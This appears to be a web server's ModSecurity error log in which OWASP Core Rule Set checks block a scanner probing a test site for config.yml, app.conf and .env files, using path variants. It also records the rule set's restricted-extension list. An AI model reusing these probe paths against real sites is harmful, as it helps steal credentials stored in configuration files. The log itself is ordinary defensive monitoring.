[Fri Jan 16 03:18:33.657909 2026] [:error] [pid 1444226] [client 45.148.10.246:54476] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/config.yml"] [unique_id "aWmf-WcpoCUgeFICb0be1gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/config/config.yml
[Fri Jan 16 03:18:33.658072 2026] [:error] [pid 1444226] [client 45.148.10.246:54476] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/config.yml"] [unique_id "aWmf-WcpoCUgeFICb0be1gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/config/config.yml
[Fri Jan 16 03:18:33.883450 2026] [:error] [pid 1444034] [client 45.148.10.246:54490] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /config/config.yml/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/config.yml/"] [unique_id "aWmf-eRfEYyDES-ZFL4hzwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/config.yml/
[Fri Jan 16 03:18:33.883683 2026] [:error] [pid 1444034] [client 45.148.10.246:54490] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/config.yml/"] [unique_id "aWmf-eRfEYyDES-ZFL4hzwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/config.yml/
[Fri Jan 16 03:18:33.883865 2026] [:error] [pid 1444034] [client 45.148.10.246:54490] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/config.yml/"] [unique_id "aWmf-eRfEYyDES-ZFL4hzwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/config.yml/
[Fri Jan 16 03:18:34.039403 2026] [:error] [pid 1444035] [client 45.148.10.246:54492] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/config.yml"] [unique_id "aWmf-rauW6yeGWXfDeFXNwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//config/config.yml
[Fri Jan 16 03:18:34.039627 2026] [:error] [pid 1444035] [client 45.148.10.246:54492] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/config.yml"] [unique_id "aWmf-rauW6yeGWXfDeFXNwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//config/config.yml
[Fri Jan 16 03:18:34.039789 2026] [:error] [pid 1444035] [client 45.148.10.246:54492] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/config.yml"] [unique_id "aWmf-rauW6yeGWXfDeFXNwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//config/config.yml
[Fri Jan 16 03:18:35.704295 2026] [:error] [pid 1444040] [client 45.148.10.246:54562] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/app.conf"] [unique_id "aWmf-_n_5sIyKhJ5GAzZoAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/app.conf
[Fri Jan 16 03:18:35.704645 2026] [:error] [pid 1444040] [client 45.148.10.246:54562] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/app.conf"] [unique_id "aWmf-_n_5sIyKhJ5GAzZoAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/app.conf
[Fri Jan 16 03:18:35.704820 2026] [:error] [pid 1444040] [client 45.148.10.246:54562] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/app.conf"] [unique_id "aWmf-_n_5sIyKhJ5GAzZoAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/app.conf
[Fri Jan 16 03:18:36.029072 2026] [:error] [pid 1444226] [client 45.148.10.246:54594] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/app.conf"] [unique_id "aWmf_GcpoCUgeFICb0be2AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/app.conf
[Fri Jan 16 03:18:36.029429 2026] [:error] [pid 1444226] [client 45.148.10.246:54594] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/app.conf"] [unique_id "aWmf_GcpoCUgeFICb0be2AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/app.conf
[Fri Jan 16 03:18:36.029589 2026] [:error] [pid 1444226] [client 45.148.10.246:54594] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/app.conf"] [unique_id "aWmf_GcpoCUgeFICb0be2AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/app.conf
[Fri Jan 16 03:18:36.191435 2026] [:error] [pid 1444034] [client 45.148.10.246:54598] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/app.conf"] [unique_id "aWmf_ORfEYyDES-ZFL4h0QAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/app.conf
[Fri Jan 16 03:18:36.191779 2026] [:error] [pid 1444034] [client 45.148.10.246:54598] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/app.conf"] [unique_id "aWmf_ORfEYyDES-ZFL4h0QAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/app.conf
[Fri Jan 16 03:18:36.191948 2026] [:error] [pid 1444034] [client 45.148.10.246:54598] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/app.conf"] [unique_id "aWmf_ORfEYyDES-ZFL4h0QAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/app.conf
[Fri Jan 16 03:18:36.343196 2026] [:error] [pid 1444035] [client 45.148.10.246:54606] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/app.conf"] [unique_id "aWmf_LauW6yeGWXfDeFXOQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/conf/app.conf
[Fri Jan 16 03:18:36.343519 2026] [:error] [pid 1444035] [client 45.148.10.246:54606] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/app.conf"] [unique_id "aWmf_LauW6yeGWXfDeFXOQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/conf/app.conf
[Fri Jan 16 03:18:36.343688 2026] [:error] [pid 1444035] [client 45.148.10.246:54606] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/app.conf"] [unique_id "aWmf_LauW6yeGWXfDeFXOQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/conf/app.conf
[Fri Jan 16 03:18:36.734146 2026] [:error] [pid 1444040] [client 45.148.10.246:54630] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/app.conf"] [unique_id "aWmf_Pn_5sIyKhJ5GAzZoQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//conf/app.conf
[Fri Jan 16 03:18:36.734499 2026] [:error] [pid 1444040] [client 45.148.10.246:54630] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/app.conf"] [unique_id "aWmf_Pn_5sIyKhJ5GAzZoQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//conf/app.conf
[Fri Jan 16 03:18:36.736303 2026] [:error] [pid 1444040] [client 45.148.10.246:54630] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/app.conf"] [unique_id "aWmf_Pn_5sIyKhJ5GAzZoQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//conf/app.conf
[Fri Jan 16 03:18:36.900741 2026] [:error] [pid 1444032] [client 45.148.10.246:54634] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/app.conf"] [unique_id "aWmf_OkMvq8uPO2ZciWp0wAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./conf/app.conf
[Fri Jan 16 03:18:36.901097 2026] [:error] [pid 1444032] [client 45.148.10.246:54634] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/app.conf"] [unique_id "aWmf_OkMvq8uPO2ZciWp0wAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./conf/app.conf
[Fri Jan 16 03:18:36.901271 2026] [:error] [pid 1444032] [client 45.148.10.246:54634] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/app.conf"] [unique_id "aWmf_OkMvq8uPO2ZciWp0wAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./conf/app.conf
[Fri Jan 16 03:18:37.060071 2026] [:error] [pid 1444226] [client 45.148.10.246:54636] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWmf_WcpoCUgeFICb0be2QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env
[Fri Jan 16 03:18:37.060304 2026] [:error] [pid 1444226] [client 45.148.10.246:54636] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWmf_WcpoCUgeFICb0be2QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env
[Fri Jan 16 03:18:37.060476 2026] [:error] [pid 1444226] [client 45.148.10.246:54636] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWmf_WcpoCUgeFICb0be2QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env
[Fri Jan 16 03:18:37.382612 2026] [:error] [pid 1444035] [client 45.148.10.246:54644] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWmf_bauW6yeGWXfDeFXOgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env
[Fri Jan 16 03:18:37.382845 2026] [:error] [pid 1444035] [client 45.148.10.246:54644] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWmf_bauW6yeGWXfDeFXOgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env
[Fri Jan 16 03:18:37.383001 2026] [:error] [pid 1444035] [client 45.148.10.246:54644] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWmf_bauW6yeGWXfDeFXOgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env
[Fri Jan 16 03:18:37.505899 2026] [:error] [pid 1444033] [client 45.148.10.246:54654] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWmf_dLJkp65ULFQ2YYiPwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env
[Fri Jan 16 03:18:37.506126 2026] [:error] [pid 1444033] [client 45.148.10.246:54654] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWmf_dLJkp65ULFQ2YYiPwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env
